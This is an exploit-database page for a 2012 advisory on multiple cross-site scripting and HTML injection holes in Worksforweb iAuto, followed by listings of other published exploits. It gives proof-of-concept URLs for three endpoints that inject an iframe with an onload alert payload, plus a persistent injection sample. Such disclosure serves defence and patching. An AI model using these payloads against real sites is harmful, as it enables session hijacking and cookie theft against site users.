Menu

Search for hundreds of thousands of exploits

"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities"

Author

Exploit author

"Benjamin Kunz Mejri"

Platform

Exploit platform

multiple

Release date

Exploit published date

2012-08-06

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
source: https://www.securityfocus.com/bid/54812/info

Worksforweb iAuto is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 

Review:  Add Comments - Listing

<div class="addComment">
<h1>Reply to The Comment</h1>
<div class="pageDescription">
<div class="commentInfo">You are replying to the comment 
#"><iframe src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])' 
<="" to="" 
listing="" #448="" "<span="" class="fieldValue fieldValueYear" height="900" width="1000">2007</span>
<span class="fieldValue fieldValueMake">Acura</span> 



1.2
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or highr equired 
user inter action.
Fo demonstration or reproduce ...

String: "><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert("VulnerabilityLab") <

Dealer > Search Sellers > City

PoC:
http://www.example.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+
width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search


Browse by Make and Model / AC Cobra / >

PoC:
http://www.example.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20
width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/


Comments > Reply to The Comment > Topic & Text (commentSid)

PoC:
http://www.example.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000
%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2013-09-23 "SilverStripe CMS - Multiple HTML Injection Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2013-09-10 "eTransfer Lite - 'file name' HTML Injection" webapps php "Benjamin Kunz Mejri"
2013-07-17 "Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2013-07-09 "Air Drive Plus - Multiple Input Validation Vulnerabilities" remote ios "Benjamin Kunz Mejri"
2013-02-23 "File Manager - HTML Injection / Local File Inclusion" webapps php "Benjamin Kunz Mejri"
2013-02-14 "Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities" remote multiple "Benjamin Kunz Mejri"
2012-12-01 "Fortinet FortiWeb (Multiple Appliances) - Multiple Cross-Site Scripting Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2012-09-18 "AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities" webapps cgi "Benjamin Kunz Mejri"
2012-08-06 "Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities" webapps multiple "Benjamin Kunz Mejri"
2012-08-02 "WordPress Theme ShopperPress - SQL Injection / Cross-Site Scripting" webapps php "Benjamin Kunz Mejri"
2012-08-02 "Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2012-08-01 "Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-07-18 "Barracuda SSL VPN - 'launchAgent.do?return-To' Cross-Site Scripting" remote hardware "Benjamin Kunz Mejri"
2012-07-18 "Barracuda SSL VPN - 'fileSystem.do' Multiple Cross-Site Scripting Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2012-07-16 "Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-07-12 "Phonalisa - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-06-28 "Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities" webapps hardware "Benjamin Kunz Mejri"
2012-03-08 "Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2012-02-22 "Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-02-12 "eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-02-10 "Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection" webapps php "Benjamin Kunz Mejri"
2012-01-10 "SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities" remote multiple "Benjamin Kunz Mejri"
2011-12-20 "Cyberoam UTM 10 - 'tableid' SQL Injection" webapps php "Benjamin Kunz Mejri"
2011-11-01 "Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Security Vulnerabilities" webapps jsp "Benjamin Kunz Mejri" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected